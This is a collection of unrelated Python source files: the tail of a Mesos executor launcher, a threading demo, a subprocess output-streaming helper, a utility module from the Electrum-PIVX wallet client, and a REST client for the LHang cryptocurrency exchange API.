arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.parse_args()
ensure_mesos_libs()
log.info("Starting LWR executor")
driver = MesosExecutorDriver(LwrExecutor())
exit_code = 0
if not driver.run() == mesos_pb2.DRIVER_STOPPED:
exit_code = 1
return exit_code
if __name__ == "__main__":
sys.exit(run_executor())
|
t_threading2.py
|
#!/usr/bin/env python
#coding:utf-8
# Author:
# Purpose:
# Created: 2013年3月27日
import threading
import time
def worker(i=1):
print "test:",i
time.sleep(2)
print 'after'
for i in xrange(5):
t = threading.Thread(target=worker,args=[2])
t.start()
time.sleep(5)
print "current has %d threads" % (threading.activeCount() - 1)
|
ext_subprocess.py
|
import subprocess
import sys
import threading
def run_command_stream_output(cmd: str):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
_stream_output_from_process(process)
def run_command_in_background_stream_output(cmd: str):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output_thread = threading.Thread(
target=_stream_output_from_process, args=(process,), daemon=True
)
output_thread.start()
def _stream_output_from_process(process: subprocess.Popen):
for line in iter(process.stdout.readline, b""): # type: ignore
sys.stdout.write(line.decode("utf-8"))
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Electrum-PIVX - lightweight PIVX client
# Copyright (C) 2018 random.zebra
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-pivx")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-Pivx")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-Pivx")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a PIVX address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a PIVX URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid PIVX address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
|
vnlhang.py
|
# encoding: utf-8
import urllib
import hashlib
import requests
from Queue import Queue, Empty
from threading import Thread
from time import sleep
LHANG_API_ROOT ="https://api.lhang.com/v1/"
FUNCTION_TICKER = ('ticker.do', 'get')
FUNCTION_DEPTH = ('depth.do', 'get')
FUNCTION_TRADES = ('trades.do', 'get')
FUNCTION_KLINE = ('kline.do', 'get')
FUNCTION_USERINFO = ('user_info.do', 'post')
FUNCTION_CREATEORDER = ('create_order.do', 'post')
FUNCTION_CANCELORDER = ('cancel_order.do', 'post')
FUNCTION_ORDERSINFO = ('orders_info.do', 'post')
FUNCTION_ORDERSINFOHISTORY = ('orders_info_history.do', 'post')
#----------------------------------------------------------------------
def signature(params, secretKey):
"""生成签名"""
params = sorted(params.iteritems(), key=lambda d:d[0], reverse=False)
params.append(('secret_key', secretKey))
message = urllib.urlencode(params)
m = hashlib.md5()
m.update(message)
m.digest()
sig=m.hexdigest()
return sig
########################################################################
class LhangApi(object):
""""""
DEBUG = True
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.apiKey = ''
self.secretKey = ''
self.interval = 1 # 每次请求的间隔等待
self.active = False # API工作状态
self.reqID = 0 # 请求编号
self.reqQueue = Queue() # 请求队列
self.reqThread = Thread(target=self.processQueue) # 请求处理线程
#----------------------------------------------------------------------
def init(self, apiKey, secretKey, interval):
"""初始化"""
self.apiKey = apiKey
self.secretKey = secretKey
self.interval = interval
self.active = True
self.reqThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
#----------------------------------------------------------------------
def processRequest(self, req):
"""处理请求"""
# 读取方法和参数
api, method = req['function']
params = req['params']
url = LHANG_API_ROOT + api
# 在参数中增加必须的字段
params['api_key'] = self.apiKey
# 添加签名
sign = signature(params, self.secretKey)
params['sign'] = sign
# 发送请求
payload = urllib.urlencode(params)
r = requests.request(method, url, params=payload)
if r.status_code == 200:
data = r.json()
return data
else:
return None
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
req = self.reqQueue.get(block=True, timeout=1) # 获取请求的阻塞为一秒
callback = req['callback']
reqID = req['reqID']
data = self.processRequest(req)
# 请求失败
if data is None:
error = u'请求失败'
self.onError(error, req, reqID)
elif 'error_code' in data:
error = u'请求出错,错误代码:%s' % data['error_code']
self.onError(error, req, reqID)
# 请求成功
else:
if self.DEBUG:
print callback.__name__
callback(data, req, reqID)
# 流控等待
sleep(self.interval)
except Empty:
pass
#----------------------------------------------------------------------
def sendRequest(self, function, params, callback):
"""发送请求"""
# 请求编号加1
self.reqID += 1
# 生成请求字典并放入队列中
req = {}
req['function'] = function
req['params'] = params
req['callback'] = callback
req['reqID'] = self.reqID
self.reqQueue.put(req)
# 返回请求编号
return self.reqID
#----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print error, req, reqID
###############################################
# 行情接口
###############################################
#----------------------------------------------------------------------
def getTicker(self, symbol):
"""查询行情"""
function = FUNCTION_TICKER
params = {'symbol': symbol}
callback = self.onGetTicker
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getDepth(self, symbol, size, merge):
"""查询深度"""
function = FUNCTION_DEPTH
params = {
'symbol': symbol,
'size': size,
'mege': merge
}
callback = self.onGetDepth
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getTrades(self, symbol, size, time):
"""查询历史成交"""
function = FUNCTION_TRADES
params = {
'symbol': symbol,
'size': size,
'time': time
}
callback = self.onGetTrades
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getKline(self, symbol, size, type_, time):
"""查询K线"""
function = FUNCTION_KLINE
params = {
'symbol': symbol,
'size': size,
'type': type_,
'time': time
}
callback = self.onGetKline
return self.sendRequest(function, params, callback)
#----------------------------------------------------------------------
def onGetTicker(self, data, req, reqID):
"""查询行情回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetDepth(self, data, req, reqID):
"""查询深度回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetTrades(self, data, req, reqID):
"""查询历史成交"""
print data, reqID
# ----------------------------------------------------------------------
def onGetKline(self, data, req, reqID):
"""查询K线回报"""
print data, reqID
###############################################
# 交易接口
###############################################
# ----------------------------------------------------------------------
def getUserInfo(self):
"""查询账户信息"""
function = FUNCTION_USERINFO
params = {}
callback = self.onGetUserInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def createOrder(self, symbol, type_, price, amount):
"""发送委托"""
function = FUNCTION_CREATEORDER
params = {
'symbol': symbol,
'type': type_,
'price': price,
'amount': amount
}
callback = self.onCreateOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def cancelOrder(self, symbol, orderId):
"""撤单"""
function = FUNCTION_CANCELORDER
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onCancelOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfo(self, symbol, orderId):
"""查询委托"""
function = FUNCTION_ORDERSINFO
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onGetOrdersInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfoHistory(self, symbol, status, currentPage, pageLength):
"""撤单"""
function = FUNCTION_ORDERSINFOHISTORY
params = {
'symbol': symbol,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
callback = self.onGetOrdersInfoHistory
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetUserInfo(self, data, req, reqID):
"""查询账户信息"""
print data, reqID
# ----------------------------------------------------------------------
def onCreateOrder(self, data, req, reqID):
"""委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfo(self, data, req, reqID):
"""查询委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfoHistory(self, data, req, reqID):
"""撤单回报"""
print data, reqID
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.